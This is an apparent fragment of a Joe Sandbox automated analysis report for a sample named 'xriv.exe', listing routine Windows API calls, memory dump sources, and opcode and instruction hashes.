                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                      • String ID:
                                                                      • API String ID: 2744216297-0
                                                                      • Opcode ID: 5d3119f84be7b81615f32dbda15428eaad7ebebc8a7fba1dadd0b6da30d3ab1e
                                                                      • Instruction ID: d4b5896a7bd9a3a330fe09e151bd4ff626f00e6f11a5a48cba3a132c6d431ab8
                                                                      • Opcode Fuzzy Hash: 5d3119f84be7b81615f32dbda15428eaad7ebebc8a7fba1dadd0b6da30d3ab1e
                                                                      • Instruction Fuzzy Hash: D0F03736505259BBCF372F95EC08D9A3F66FB19261B014028FB2C95220C7328960DB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SleepConditionVariableCS.KERNELBASE(?,011E7157,00000064), ref: 011E71DD
                                                                      • LeaveCriticalSection.KERNEL32(01209708,000000FF,?,011E7157,00000064,?,?,?,011D3E30,0120C468,9BC7B195,?,00000000,011F8818,000000FF), ref: 011E71E7
                                                                      • WaitForSingleObjectEx.KERNEL32(000000FF,00000000,?,011E7157,00000064,?,?,?,011D3E30,0120C468,9BC7B195,?,00000000,011F8818,000000FF), ref: 011E71F8
                                                                      • EnterCriticalSection.KERNEL32(01209708,?,011E7157,00000064,?,?,?,011D3E30,0120C468,9BC7B195,?,00000000,011F8818,000000FF), ref: 011E71FF
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                      • String ID:
                                                                      • API String ID: 3269011525-0
                                                                      • Opcode ID: 460c5b292146e3ce9d4c25c26cbc261aea714719de06ce5beab7bf0b426f3a55
                                                                      • Instruction ID: 9228c690ffdd35d274e01e606f53dd938d777e46e0c2aed8a6a052eedb7fa331
                                                                      • Opcode Fuzzy Hash: 460c5b292146e3ce9d4c25c26cbc261aea714719de06ce5beab7bf0b426f3a55
                                                                      • Instruction Fuzzy Hash: 77E09273546124EBDF2F1F92EC0DAC93E59FB48A65B020124F61E521B6C76158C08BD2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmp
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                                                                      • API String ID: 0-2325939117
                                                                      • Opcode ID: d23c6c57913cf096430df6ff221941d47a3598ed23ca4169fd58fa9c4d3d4792
                                                                      • Instruction ID: e93297ca431be00565a310f9b1d7b078b1d5f69f3f3fc11870f4556c2b056b08
                                                                      • Opcode Fuzzy Hash: d23c6c57913cf096430df6ff221941d47a3598ed23ca4169fd58fa9c4d3d4792
                                                                      • Instruction Fuzzy Hash: 8741F570E04A05AFCB2ADFDD9C88A9EBFF8EF99314F14006AE505D7241D7718A40CB95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%